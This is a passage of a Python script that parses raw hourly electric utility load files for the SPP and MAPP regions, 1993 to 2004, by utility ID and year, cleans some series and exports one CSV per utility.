        1993 : pd.read_fwf('%s/spp/1993/PSOK93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    18315 : {
        1993 : pd.read_csv('%s/spp/1993/SEPC93' % (fulldir), header=None).iloc[:, 1:].astype(str).apply(lambda x: x.str.replace('NA', '').str.strip()).replace('', '0').astype(float).values.ravel(),
        1997 : (pd.read_fwf('%s/spp/1997/SEPC97' % (fulldir), skiprows=1, header=None)[5]/1000).values,
        1999 : pd.read_csv('%s/spp/1999/SEPC99' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].str.strip().replace('#VALUE!', '0').astype(float).values,
        2000 : pd.read_csv('%s/spp/2000/SEPC00' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
        2001 : pd.read_csv('%s/spp/2001/SEPC01' % (fulldir), sep='\t', skipinitialspace=True, header=None)[3].apply(lambda x: 0 if len(x) > 3 else x).astype(float).values,
        2002 : (pd.read_fwf('%s/spp/2002/SEPC02' % (fulldir), skiprows=1, header=None)[6]).str.replace('"', '').str.strip().astype(float).values,
        2004 : pd.read_csv('%s/spp/2004/SEPC04' % (fulldir), header=None, sep='\t')[5].values
    },
    20447 : {
        1993 : pd.read_csv('%s/spp/1993/WFEC93' % (fulldir)).iloc[:, 0].values,
        2000 : pd.read_csv('%s/spp/2000/WFEC00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[0].values
    },
    20391 : {
        1993 : pd.DataFrame([i.split() for i in open('%s/spp/1993/WPEK93' % (fulldir)).readlines()[:]]).iloc[:365, 1:25].astype(float).values.ravel(),
        1996 : pd.read_excel('%s/spp/1996/WPEK96' % (fulldir), skiprows=2).dropna().iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/spp/1998/WPEK98' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
        2000 : pd.read_csv('%s/spp/2000/WPEK00' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
        2001 : pd.read_csv('%s/spp/2001/WPEK01' % (fulldir), header=None, sep=' ', skipinitialspace=True)[6].values,
        2002 : pd.read_csv('%s/spp/2002/WPEK02' % (fulldir), header=None, sep=' ', skipinitialspace=True)[4].values
    },
    3283 : {
        1997 : pd.read_fwf('%s/spp/1997/CSWS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/spp/1998/CSWS98' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True, header=None)[2].values,
        1999 : pd.read_csv('%s/spp/1999/CSWS99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[2].values,
        2000 : pd.read_csv('%s/spp/2000/CSWS00' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None)[2].values
    },
    40233 : {
        2000 : pd.read_fwf('%s/spp/2000/SRGT00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
        2001 : pd.read_fwf('%s/spp/2001/SRGT01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
    },
    7349 : {
        1997 : pd.read_csv('%s/spp/1997/GSEC97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_csv('%s/spp/1998/GSEC98' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_csv('%s/spp/1999/GSEC99' % (fulldir), sep='\s', skipinitialspace=True, skiprows=2, header=None)[17].dropna().values,
        2000 : pd.read_csv('%s/spp/2000/GSEC00' % (fulldir), skiprows=1, engine='python', header=None)[0].values,
        2001 : pd.DataFrame([i.split() for i in open('%s/spp/2001/GSEC01' % (fulldir)).readlines()[1:]])[0].astype(float).values,
        2002 : pd.read_csv('%s/spp/2002/GSEC02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=2, header=None)[5].values,
        2003 : pd.read_csv('%s/spp/2003/GSEC03' % (fulldir), header=None)[2].values,
        2004 : (pd.read_csv('%s/spp/2004/GSEC04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[5]/1000).values
    }
}
# Manual data cleaning before export:
# - zero out implausibly large LUS 2003 values (zeros become NaN below);
# - discard the KCPU 2002 and GSEC 2003 series entirely (replace with NaN
#   arrays of the same length), presumably because the parses are unusable —
#   verify against the raw files if these years are ever needed.
spp[9096][2003][spp[9096][2003] > 600] = 0
spp[9996][2002] = np.repeat(np.nan, len(spp[9996][2002]))
spp[7349][2003] = np.repeat(np.nan, len(spp[7349][2003]))
# Export one CSV per utility: concatenate every available year into one
# hourly-indexed series (each year's index starts Jan 1 and runs for as many
# hours as that year's array holds), sort chronologically, and replace 0
# with NaN to mark missing observations.
if not os.path.exists('./spp'):
    os.mkdir('spp')
for k in spp.keys():
    print k
    s = pd.DataFrame(pd.concat([pd.Series(spp[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(spp[k][i]))) for i in spp[k].keys()]).sort_index(), columns=['load'])
    s['load'] = s['load'].astype(float).replace(0, np.nan)
    s.to_csv('./spp/%s.csv' % k)
###### MAPP
# CIPC: 3258
# CP: 4322
# CBPC: 4363
# DPC: 4716
# HUC: 9130
# IES: 9219
# IPW: 9417 <- 9392
# IIGE: 9438
# LES: 11018
# MPL: 12647
# MPC: 12658
# MDU: 12819
# MEAN: 21352
# MPW: 13143
# NPPD: 13337
# NSP: 13781
# NWPS: 13809
# OPPD: 14127
# OTP: 14232
# SMMP: 40580
# UPA: 19514
# WPPI: 20858
# MEC: 12341 <- 9435
# CPA: 4322
# MWPS: 23333
mapp = {
3258 : {
1998 : pd.read_fwf('%s/mapp/1998/CIPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
4322 : {
1993 : pd.read_fwf('%s/mapp/1993/CP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CP96' % (fulldir), header=None).iloc[:, 2:].values.ravel()
},
4363 : {
1993 : pd.read_fwf('%s/mapp/1993/CBPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/CBPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/CBPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/CBPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/CBPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/CB02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
4716 : {
1993 : pd.read_fwf('%s/mapp/1993/DPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/DPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_csv('%s/mapp/1996/DPC96' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 6:].values.ravel()
},
9130 : {
1993 : pd.read_fwf('%s/mapp/1993/HUC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/HUC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/HUC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/HUC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/HUC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/HUC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/HUC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/HUC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9219 : {
1993 : pd.read_fwf('%s/mapp/1993/IESC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IESC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IESC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9417 : {
1993 : pd.read_fwf('%s/mapp/1993/IPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/IPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/IPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/IPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/IPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9438 : {
1993 : pd.read_fwf('%s/mapp/1993/IIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/IIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/IIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
11018 : {
1993 : pd.read_fwf('%s/mapp/1993/LES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/LES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_csv('%s/mapp/1995/LES95' % (fulldir)).iloc[:, 1:].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/LES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/LES97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/LES98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/LES99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_excel('%s/mapp/2000/LES00' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/mapp/2001/LES01' % (fulldir), skipfooter=3).iloc[:, 1:].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/LES02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/LES03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12647 : {
1995 : pd.read_fwf('%s/mapp/1995/MPL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/MPL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/MPL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
12658 : {
1993 : pd.read_fwf('%s/mapp/1993/MPC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPC02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
12819 : {
1993 : pd.read_fwf('%s/mapp/1993/MDU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MDU94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MDU95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MDU96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MDU97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MDU98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MDU99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MDU02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MDU03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
21352 : {
1993 : pd.read_fwf('%s/mapp/1993/MEAN93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MEAN95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MEAN96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MEAN97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MEAN98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MEAN99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).dropna().values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MEAN02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MEAN03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13143 : {
1993 : pd.read_fwf('%s/mapp/1993/MPW93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/MPW94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/MPW95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/MPW96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/MPW97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:-1, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/MPW98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/MPW99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_fwf('%s/mapp/2002/MPW02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/MPW03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13337 : {
1993 : pd.read_fwf('%s/mapp/1993/NPPD93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NPPD94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NPPD95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=6).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NPPD96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NPPD97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NPPD98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NPPD99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_fwf('%s/mapp/2000/NPPD00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_fwf('%s/mapp/2001/NPPD01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=9, skipfooter=1).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_csv('%s/mapp/2002/NPPD02' % (fulldir), sep='\t', skipinitialspace=True, header=None).iloc[:, 2:].values.ravel(),
2003 : pd.read_fwf('%s/mapp/2003/NPPD03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13781 : {
1993 : pd.read_fwf('%s/mapp/1993/NSP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/mapp/1994/NSP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NSP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NSP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NSP98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/mapp/1999/NSP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2000 : pd.read_csv('%s/mapp/2000/NSP00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=2, header=None, skipfooter=1)[2].values
},
13809 : {
1993 : pd.read_fwf('%s/mapp/1993/NWPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1995 : pd.read_fwf('%s/mapp/1995/NWPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1996 : pd.read_fwf('%s/mapp/1996/NWPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1997 : pd.read_fwf('%s/mapp/1997/NWPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
1998 : pd.read_fwf('%s/mapp/1998/NWPS98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
